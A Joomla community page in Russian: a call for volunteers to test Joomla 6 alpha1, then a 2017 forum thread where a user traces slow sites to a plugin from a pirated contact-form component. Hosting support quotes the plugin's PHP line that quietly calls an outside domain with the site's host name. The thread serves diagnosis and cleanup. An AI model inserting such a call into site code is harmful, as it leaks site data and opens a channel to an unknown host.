Новости Joomla

Joomla 6 нуждается в вашей помощи с тестированием.Вышел недавно релиз Joomla 6 alpha1

Joomla 6 нуждается в вашей помощи с тестированием.Вышел недавно релиз Joomla 6 alpha1

👩‍💻 Joomla 6 нуждается в вашей помощи с тестированием.Вышел недавно релиз Joomla 6 alpha1. Это релиз, в который включены уже проверенные изменения, но ещё очень многие исправления и улучшения ждут своей очереди. Joomla следит за качеством и безопасностью своего кода и каждое изменение должно быть успешно протестировано как минимум ещё двумя участниками сообщества. Разработка Joomla ведётся на платформе GitHub.Филипп Уолтон (Philip Walton) - один из разработчиков, кто активно вносит свой вклад в ядро Joomla. Он уже несколько месяцев посвящает свои послеполуденные часы пятницы работе с Joomla и предлагает присоединиться к нему. 📆 Пятница, 30 мая 2025, с 15:00 до 17:00 по UTC (Лондон) - с 18:00 до 20:00 по Москве.В чате Google Meet Филипп готов помочь с тестированием тем, кто будет делать это в первый раз. А так же он подготовил список лёгких Pull Request, которые можно протестировать довольно быстро. Чем больше тестов будет проведено сейчас, тем меньше ошибок вылезет потом. На данный момент 148 (уже 147 на момент написания заметки) PR на GitHub Joomla ждут тестирования.👩‍💻 Open to all. All together.Также вам поможет сделать первые шаги это видео.GitHub JoomlaДа, это вечер пятницы. Но тестирование занимает порой минут 15, а доброе дело сделано. Просто убедитесь, что разработчик чего-то не пропустил и всё работает как ожидается.#joomla #joomla6 #community

• 4 Ответов
  • 1643 Просмотров
*

jeanzzz

• Осваиваюсь на форуме
  • 35
  • 1 / 0
Всем привет. Столкнулся с проблемой: уже 4 ночь подряд Яндекс метрика сигнализирует мне, что сразу два моих сайта недоступны. Продолжается это дело по 1-2 часа. Связался с поддержкой хостинга. Они ответили мне следующее:

Скрипты сайтов  пытаются подключится к удаленному серверу 91.210.165.88 , который в данный момент недоступен, из-за этого и медленно загружаются сайты.
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("91.210.165.88")}, 16) = -1 EINPROGRESS (Operation now in progress)
poll([{fd=4, events=POLLIN|POLLOUT|POLLERR|POLLHUP}], 1, 60000

Что это может быть за IP адрес и с какой целью туда обращаются скрипты сайта понять никак не могу. У меня несколько сайтов на Joomla 3.6.5. Проблемы только с двумя. Когда айпишник 91.210.165.88 работает в браузере, и сайты у меня отлично работают. Когда нет - страница загружается по 2 минуты.

Поискал в сети информацию. Обнаружил, что полгода назад у человека была подобная проблема с этим IP адресом и Joomla (https://www.weblancer.net/projects/veb-programmirovanie-31/pochistit-joomla-sajt-ot-virusov-774949/). Он предполагал вирус, но судя по отзыву на работу, дело оказалось в глючном модуле оплаты («Думали что на сайте вирус, оказался глючный модуль оплаты, который перестал работать по непонятным причинам и тормозил весь сайт».) У меня никаких модулей оплаты нет в принципе.

Что это за модуль, плагин или компонент понять никак не могу. Ночью пытался отключать всё подозрительное - не помогало. На всякий случай проверил все файлы архива на предмет нахождения в них текстового фрагмента - IP адреса 91.210.165.88 - нашлось лишь одно упоминание в файле strace.log корня сайта: connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("91.210.165.88")}, 16) = -1 EINPROGRESS (Operation now in progress)

Какие наводящие вопросы ещё могу задать поддержке хостинга не понимаю. Как решить вопрос тоже...

P.S: Вот что сейчас добавила поддержка:

«Здравствуйте.
Скрипт выполняет запрос к стороннему сайту:
sendto(6, "GET /?d=SITENAME.ru HTTP/1.0\r\n", 36, MSG_DONTWAIT, NULL, 0) = 36
sendto(6, "Host: gene7conf.com\r\n", 21, MSG_DONTWAIT, NULL, 0) = 21

по сути загружает эту страницу http://gene7conf.com/?d=sitename.ru

Код который выполняет это запрос находится в файле httpdocs/plugins/system/section/section.php
Конкретно вот этот участок кода:
$Conf = @file_get_contents('http://gene7conf.com/?d=' . $_SERVER['HTTP_HOST']);

Судя по всему, это какой то плагин CMS.»

« Последнее редактирование: 12.02.2017, 10:23:58 от jeanzzz »
*

effrit

• Легенда
  • 10132
  • 1118 / 13
  • effrit.com
Re: Бесконечная загрузка двух сайтов
« Ответ #1 : 12.02.2017, 10:17:36 »
ну это плагины системной группы.
в стандартном дистрибе точно нет такого.
имхо, это вирусня.
или в админке смотрите, что это за плагин, или в этой папке должен быть xml  с описанием
*

jeanzzz

• Осваиваюсь на форуме
  • 35
  • 1 / 0
« Ответ #2 : 12.02.2017, 10:23:00 »
Уже посмотрел все файлы архива сайта на наличие фрагмента System - Section через Total Comander. Обнаружил два файла:

\administrator\components\com_flexycontactplus\helpers\default Info.php
и
\installation\sql\site.s06

Понятно, что дело в компоненте FlexyContactPlus. Был грех давным давно установил этот варез, а замену именно ему так руки и не дошли найти. Но как теперь избавиться от заразы?
*

effrit

• Легенда
  • 10132
  • 1118 / 13
  • effrit.com
« Ответ #3 : 12.02.2017, 10:28:39 »
ну вы сами себе поднасрали, простите за мой французский :)
что уж, не найти бесплатной обратной связи?
сносите, ставьте нормальный компонент и мониторьте.
можно прогнать архив через вирустотал, до кучи
*

jeanzzz

• Осваиваюсь на форуме
  • 35
  • 1 / 0
« Ответ #4 : 12.02.2017, 10:52:11 »
В общем, удалил сам компонент и явно связанный с аномальным поведением плагин «System - Section». Буду наблюдать, что дальше.

Самое интересное, что варез изначально был установлен на этих сайтах, когда только начал разбираться с Joomla. Потом понял, насколько это опасно, поменял шаблон со скачанного неизвестно где на модифицированный мною же стандартный Protostar, поудалял кучу всяких сомнительных расширений. А вот с этим Flexy Contact Plus просто понадеялся на авось. Уж больно функциональный и полезный компонент оказался (среди бесплатных таких нет). Ну и вот результат... 1,5 года работал - и тут на тебе. Если уж делать всё легально, то без исключений.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Fox Contact загрузка файлов

Автор xrumchikov

Ответов: 5
Просмотров: 1133
Последний ответ 07.08.2019, 09:37:00
от xrumchikov
Seblod примеры сайтов

Автор Sirius02030

Ответов: 0
Просмотров: 873